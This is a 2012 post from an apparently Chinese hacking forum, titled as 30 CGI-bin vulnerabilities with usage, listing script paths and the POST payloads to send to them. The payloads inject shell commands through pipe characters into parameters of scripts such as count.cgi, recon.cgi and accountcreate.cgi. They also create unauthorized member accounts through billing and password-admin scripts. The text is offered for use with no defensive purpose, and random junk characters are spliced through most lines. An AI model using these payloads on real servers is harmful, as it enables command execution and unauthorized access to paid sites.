找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2535|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
==============================1 [* o& }/ |2 G

# i. ?$ f9 G3 U4 s: F. h/smspass.pl1 `$ D8 [* G! m0 S  `
username=username&password=password
! n( ]+ I: o& l) e: x8 F8 d- O2 p, A
# }' U: }0 e/ B" [$ L. S" R5 |/index.cgi
% x3 M( `  T" N* Rwei=ren&gen=command
6 G% L, t3 w9 S- M" u) J8 _" ?3 d, g5 N: C, B7 e
/passmaster.cgi) f3 f8 ?5 D* [* m; G! D4 L& f8 A
Action=Add&Username=Username&Password=Password
" f  p! S. b8 m+ M4 j; e( {4 @/ G" P/ A
/accountcreate.cgi' ]; w; ?& e9 c$ Z, A
username=username&password=password&ref1=|echo;ls|
: W0 |- H0 L: U3 [
7 L; [# U6 f8 U/ R/form.cgi
, c$ a$ i) y; y! |# C) Z# d" N8 ~7 Tname=xxxx&email=email&subject=xxxx&response=|echo;ls|5 P. x5 ?" T* x) H
5 R" R. t2 U! Z% M2 u/ Z
/addusr.pl
' l4 I+ Y1 [) P- @9 X, c4 X/cgi-bin/EuroDebit/addusr.pl
+ o" I( j/ D3 `. F/ Wuser=username&pass=Password&confirm=Password
. ]1 z% I" d8 k& W- }0 g* w' g! k* ]1 X% B# e6 a4 t
/ccbill-local.asp
9 s# U2 h& V! N' v  {* b0 wpost_values=username:password
+ g; N9 [8 m9 V- P3 `# u- [' P, d6 k7 I3 \0 d' L% b
/count.cgi% s; i% H4 L# s- e* e
pinfile=|echo;ls -la;exit|' T% n/ `2 M- @3 e- R5 Y0 ~& g$ G
: t6 }9 @$ G" u. i0 b$ [
/recon.cgi( G  `7 ~; ^% I$ w+ \" _" S' ]
/recon.cgi?search
: D: `" F0 d, T  r% p- msearchoption=1&searchfor=|echo;ls -al;exit|' k# \- {+ O1 E* o

' V1 B5 t. j; t; s$ g/verotelrum.pl& g2 ?! v$ t, j4 a8 N' b
vercode=username:password:dseegsow:add:amount<&30>* w0 b4 I. L' y  F" C

" m. M& c3 i/ ]: V/af.cgi1 ]8 L2 v! P6 S( X8 _
_browser_out=|echo;ls -la;exit;|
0 O) k( F7 w5 _
; D7 N) t# b; X" I8 z9 s  N/modify.cgi
+ }; D/ |5 ~; i% ~3 Pusername=username&password=password&expire=30
2 L/ z& Y8 ]3 p- s/ o# A7 ?
; t6 b- h! I( l7 o' n% x/openjournal.cgi
0 Q4 c; m  S4 D& q* x+ R& Vedit=1&ct=2&go=|echo;ls -al;exit|5 @- d' n: c, [4 h5 i
4 R1 }8 k  e5 y2 L1 L: G' l/ _/ k
/gx9passwd.cgi
& s# r" k* U% p. S8 c1 Jcmd=ADD&user=username&pass=password% B, r7 z: c  r. i  n
* I; y8 [3 i  E3 n3 m* l
/probecontrol.cgi
5 D& X$ g7 B2 J* `7 fcommand=enable&username=username&password=password( M/ p# j4 u6 O4 f5 ~4 }' j
# W: _- f) y4 O0 K( p- K
/recon.cgi
7 S( ]' p1 `1 ysearchoption=3&searchfor=echo;ls -la;exit' [, E% _# @: M5 M5 a
1 M, `6 u" u+ W
/htadd.pl/ ]) W7 B% g( ~" ~7 i7 B
configfile=|echo; ls -alt; exit: R3 a! O* A5 e5 F
  z. M# l: p! d3 O+ ~6 n* T3 Q4 s+ Y
/gx9passwd.cgi
* A7 a+ G1 h0 U7 k# z, icmd=ADD&user=username&pass=password
# k' C+ t' ]( S' v/ H
: l# H& f% |0 N7 L/ibill*.pl$ I( j/ y* Z% X% l: U
reqtype=add&authpwd=authpwd&username=username&password=password2 Y8 y5 V" X4 K
8 x. c2 Z1 M5 `  c5 O2 u
/cpay.cgi
, I# z6 i4 h- u. l% Ucommand=add_member&username=username(EMAIL)&password=password(DES)
( {( O- j& a8 m- o: _* x
2 Z+ d4 F  R& ~+ ?- x- O' X/globill_ut.cgi7 Z+ L' h+ n2 r& E0 P9 L
do=add&username=username&password=password&wpassword=password; n* p/ e) j% l- a6 H0 V' H2 `
# b0 o6 m* z% M& ]  }- x  i2 q7 m
/usercontrol.cgi9 K. m- X. _: N8 ~4 s$ p
command=enable&username=USER&password=PASS2 X: A) C) x: O. f: _

! d' U( ~$ R  k  f' X, H7 q/globoSALErum.cgi
2 Y7 u/ G- L& f* _action=ADD&seccode=seccode&login=username&password=password' h2 u! o1 E) o

, J0 E: J) d- o/addusr.pl6 j" H- ~- J/ p1 Z' b* ^4 u, D2 @
user=USER&pass=PASS&confirm=PASS, L" h% G' Q( b4 J: e+ j. R
6 v: |' }0 V) Q1 A
/pincount.cgi
5 r) l3 d" x0 C# t9 N0 W0 I' G/cgi-bin/mastergate/pincount.cgi
2 Z$ w0 \6 U2 D4 S6 e2 x* gpinfile=|echo;pwd;exit|
; k* k+ D5 L' n# h' P% X8 l$ k7 v( w2 V! u
/accountcreate.cgi
0 |7 L) Y# }5 d! C/cgi-bin/gateway/accountcreate.cgi. G  z, B1 I" S
username=username&password=password&password2=password&ref1=|echo;ls -al;exit# w3 h) K+ v3 |7 w" r2 W" E

) C3 E, v" o) E; f/af.cgi: H9 k+ t/ |' J+ f8 l  [
/env.cgi; B) C4 ^/ ~8 ^) V- O
ADD+;echo;pwd;exit
6 }  a5 r; s3 l+ e
/ {+ E1 d, I6 Z3 n; ?/count.cgi5 h# \0 |; |9 D9 t3 Z# g
pinfile=|echo;pwd;exit|
  y4 T7 z, p4 V* O# _3 F
+ w, S, N' N, N3 \& X  f/ G/recon.cgi" o. ]8 p+ {& k! R
searchoption=1&searchfor=|echo;ls%20-al;exit|& d4 X- U+ k+ X. y# T/ [+ m/ `+ e, |: V7 R
! Z4 u! j, j0 N$ y/ {) w
/add.cgi
2 @* p5 I& b- Y. H) D! M  Dusername=username&password=password&expire=308 U0 T) \' R3 K( Z4 t/ b
5 Y9 s% D5 k7 ~6 S- s- t" V
==============================
% X( s  C  P/ t) t1 n: M; E/ l, o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表